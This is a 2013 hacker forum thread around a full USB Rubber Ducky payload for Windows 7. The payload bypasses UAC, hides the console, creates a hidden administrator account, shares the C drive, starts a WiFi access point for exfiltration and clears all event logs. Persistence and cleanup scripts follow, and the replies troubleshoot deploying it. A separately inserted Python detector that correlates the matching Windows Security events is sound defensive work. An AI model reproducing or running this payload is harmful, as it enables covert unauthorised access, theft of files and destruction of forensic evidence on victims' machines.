Darren Kitchen, posted August 19, 2013

I wrote this to quickly and easily exfiltrate data from a target Windows 7 machine. It's successful in sharing data without setting off alarms by touching the network or mounting mass storage.

This payload adds a hidden admin user with NTFS privs for the C drive, enables file and printer sharing, shares the C drive and creates a WiFi SoftAP on the target Windows 7 machine. Logs are cleaned on exit.

It may be better suited for exfiltration as you only require physical access to the machine for 15-20 seconds; thereafter you only require WiFi proximity to download (or upload) files. Of course your target requires a wireless interface.

I'm using a new UAC bypass and terminal obfuscation technique which could be applied to your payloads.

Payload

REM Payload: Exfiltration via WiFi SoftAP
REM Target: Windows 7
REM Author: Darren Kitchen
REM *** Initial Delay ***
DELAY 2000
REM *** Bypass UAC ***
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
REM *** Make console light yellow on bright white and very tiny ***
STRING color FE
ENTER
STRING mode con:cols=14 lines=1
ENTER
REM *** Add User techsupport ***
STRING copy con techsupport.cmd
ENTER
STRING net User techsupport techsupport /ADD
ENTER
REM *** Add User techsupport to Admin Group ***
STRING net LocalGroup Administrators techsupport /ADD
ENTER
REM *** Hide User techsupport ***
STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v techsupport /t REG_DWORD /d 0 /f
ENTER
REM *** Enable File and Printer Sharing ***
STRING netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
ENTER
REM *** Share C Drive and grant techsupport NTFS privs ***
STRING net share techsupport=c:\ /UNLIMITED
ENTER
STRING icacls c:\users\* /grant techsupport:(OI)(CI)F
ENTER
REM *** Bring up any WiFi Interfaces on the PC ***
STRING netsh interface set interface name="Wireless Network Connection" admin=enabled
ENTER
STRING netsh interface set interface name="Wireless Network Connection 2" admin=enabled
ENTER
STRING netsh interface set interface name="Wireless Network Connection 3" admin=enabled
ENTER
REM *** Start software Wireless Access Point ***
STRING netsh wlan set hostednetwork ssid=techsupport key=techsupport
ENTER
STRING netsh wlan start hostednetwork
ENTER
REM *** Clear log files and exit ***
STRING for /f %x in ('wevtutil el') do wevtutil cl "%x"
ENTER
STRING exit
ENTER
CTRL z
ENTER
REM *** Run Payload and Minimize ***
STRING techsupport.cmd
ENTER
ALT SPACE
DELAY 100
STRING n

Usage

After deploying the payload on the target Windows 7 PC, connect to the SoftAP from another machine (SSID techsupport, password techsupport) and browse to the C drive share (techsupport) with username techsupport and password techsupport.

Post-Exploitation Cleanup

From the C drive share over WiFi, upload the following script to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\cleanup.cmd

del c:\windows\system32\techsupport.cmd
net user techsupport /delete
net share techsupport /delete
for /f %x in ('wevtutil el') do wevtutil cl "%x"
del "%~f0"

Persistence

Alternatively, if you would like the techsupport user, share and network to be available all of the time, consider adding the following script to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\cleanup.cmd

netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
netsh interface set interface name="Wireless Network Connection" admin=enabled
netsh interface set interface name="Wireless Network Connection 2" admin=enabled
netsh interface set interface name="Wireless Network Connection 3" admin=enabled
netsh wlan set hostednetwork ssid=techsupport key=techsupport
netsh wlan start hostednetwork
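Defender's counterpart, added here as an example and not part of Darren's post: the payload above leaves a chain of auditable Windows Security events (account created, account added to Administrators, Winlogon SpecialAccounts\UserList value written, drive-root share added, Security log cleared). This Python script correlates those steps per host. Event IDs 4720, 4732, 4657, 5142 and 1102 are the standard Windows Security IDs; the sample records, field subset and alert threshold are constructed for the example.

```python
import re

# Constructed sample events (not real logs); field names mirror Windows Security EventData.
SAMPLE_EVENTS = [
    {"host": "WS01", "id": 4720, "TargetUserName": "techsupport"},
    {"host": "WS01", "id": 4732, "MemberName": "techsupport",
     "TargetUserName": "Administrators"},
    {"host": "WS01", "id": 4657, "ObjectValueName": "techsupport",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                   r"\Winlogon\SpecialAccounts\UserList"},
    {"host": "WS01", "id": 5142, "ShareName": r"\\*\techsupport", "ShareLocalPath": "C:\\"},
    {"host": "WS01", "id": 1102},
    {"host": "WS02", "id": 4720, "TargetUserName": "newhire"},
    {"host": "WS02", "id": 5142, "ShareName": r"\\*\reports", "ShareLocalPath": r"C:\Reports"},
]

DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")

# Event ID -> (description, predicate narrowing the event to this payload's behaviour).
# 4657 only fires when a SACL audits the Winlogon key; 1102 is written to the Security
# log after it is cleared, so a wholesale wevtutil clear still leaves a trace.
RULES = {
    4720: ("local user account created", lambda e: True),
    4732: ("account added to local Administrators",
           lambda e: e.get("TargetUserName") == "Administrators"),
    4657: ("Winlogon SpecialAccounts\\UserList changed (account hidden from logon UI)",
           lambda e: e.get("ObjectName", "").endswith(r"SpecialAccounts\UserList")),
    5142: ("network share exposing a drive root",
           lambda e: DRIVE_ROOT.match(e.get("ShareLocalPath", "")) is not None),
    1102: ("Security audit log cleared", lambda e: True),
}

def indicators_by_host(events):
    """Return {host: {event_id: description}} for events that match a rule."""
    hits = {}
    for e in events:
        rule = RULES.get(e["id"])
        if rule and rule[1](e):
            hits.setdefault(e["host"], {})[e["id"]] = rule[0]
    return hits

def alerts(events, min_indicators=3):
    """Alert on hosts showing the chained pattern: a hidden-account change or a log
    clear is high-signal on its own; otherwise require several distinct steps."""
    out = {}
    for host, hits in indicators_by_host(events).items():
        if 4657 in hits or 1102 in hits or len(hits) >= min_indicators:
            out[host] = sorted(hits)
    return out

if __name__ == "__main__":
    for host, ids in alerts(SAMPLE_EVENTS).items():
        print(host, [RULES[i][0] for i in ids])
```

Hosted-network start and stop activity is not in the Security log at all; it lands in the WLAN-AutoConfig operational log, which a real pipeline would ingest alongside these events.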
Mr-Protocol, posted August 19, 2013

Well done, hopefully this will inspire others to make some more ducky payloads.
tecra, posted September 1, 2013

I'm not understanding the payload toolkit and using custom scripts. I understand the inject.bin needs to be on the duck, but each time I use the toolkit is it creating a custom inject.bin for that payload? How do I use this exfiltration script? Just type it in payload.txt?
no42, posted September 1, 2013

1. Type it into a text file, using your favourite editor: nano, vi, notepad, notepad++.
2. Save as a txt file, e.g. payload.txt
3. Run the file through the encoder to generate a new inject.bin, e.g. java -jar encoder -i payload.txt -o /path/to/sdcard/inject.bin
4. Put the sdcard into the ducky
5. Put the ducky into the computer

The ducky reads the inject.bin file for instructions; the plain-text language above is the high-level programming language called Ducky-Script.
tecra, posted September 1, 2013

> 1. Type it into a text file, using your favourite editor: nano, vi, notepad, notepad++.
> 2. Save as a txt file, e.g. payload.txt
> 3. Run the file through the encoder to generate a new inject.bin, e.g. java -jar encoder -i payload.txt -o /path/to/sdcard/inject.bin
> 4. Put the sdcard into the ducky
> 5. Put the ducky into the computer
> The ducky reads the inject.bin file for instructions; the plain-text language above is the high-level programming language called Ducky-Script.

Thank you for the reply midnite snake. As I understand it, the encoder is used in order to complete a custom payload ;) However, when this script runs it brings up the recycle bin and then tries to rename a file?? Has anyone tested this script outside of Darren? Could my delays be off? Please see the video I took here @Dropbox http://db.tt/QiZ70olQ
tecra, posted September 1, 2013

OK, so I was able to tweak the delays and found that helping, however still not working completely. I found that the wireless network connection was being set up but not enabled.
no42, posted September 3, 2013

> OK, so I was able to tweak the delays and found that helping, however still not working completely. I found that the wireless network connection was being set up but not enabled.

It's good that you've worked out that you need to tweak the timings, but just to check, what firmware are you using, stock/community?
Darren Kitchen (author), posted September 3, 2013

It's not bringing up "Wireless Network Connection 2" and "Wireless Network Connection 3" most likely because they do not exist. In testing my target machine had 3 wireless adapters so I'd bring them all up. Most PCs will only have 1 labeled "Wireless Network Connection" (btw this is why I prefer Linux's wlan0, wlan1, wlan2, etc...)
tecra, posted September 10, 2013

> It's good that you've worked out that you need to tweak the timings, but just to check, what firmware are you using, stock/community?

I'm understanding that shipped is stock firmware. I have visited https://forums.hak5.org/index.php?/topic/28254-tutorial-re-flashingupgrading-the-ducky-winxp-32bit/ and the documentation is old. I've done everything except downloading the zip file as it no longer exists. How am I able to flash firmware?
tecra, posted September 10, 2013

This may help the kids @home: https://app.box.com/s/dr19nfs97apyi1hsy3va (Duck Programming.zip, created Sep 22, 2012 by anode@106automation.com)
tecra, posted September 10, 2013 (edited September 10, 2013)

Flashed with 2.1 hex just fine. The exfiltration payload runs better than before, please see the pastebin of cmd prompt output. Also attached are network adapters; wifi2 set up and enabled with an SSID of techsupport. Still not seeing the SSID from another machine??

http://pastebin.com/GP3CVSci
http://imgur.com/j9cj5tP,HV0ZOji#0
http://imgur.com/j9cj5tP,HV0ZOji#1
HarryT, posted October 20, 2013

Hi Darren / guys

Have run the USB exfiltration script and it works great! As for the wifi script: what version Duck Encoder was this created on? I ran this in Ver 2.4 and the payload writes fine, hopped over to Kali Linux and have been able to hook up to the techsupport hidden network, but I'm not seeing my computer name listed. I'm seeing Windows Networks only. Darren did use Ubuntu in the video; wouldn't expect it to be too different. I'm almost there; if anybody has had Kali issues and fixed it, I'd sure appreciate a nudge in the right direction!

Thanks
HarryT
escher818, posted May 20, 2014

Sorry to bring up such an old topic, but I added some of Darren's stuff in a big script of my own and the hidden user registry key doesn't work for me. After WinLogon, I don't have the sub-keys SpecialAccounts and UserList, so I was wondering if anyone knew how to incorporate those into the line Darren already posted? I didn't find much when looking up adding sub-keys from a terminal.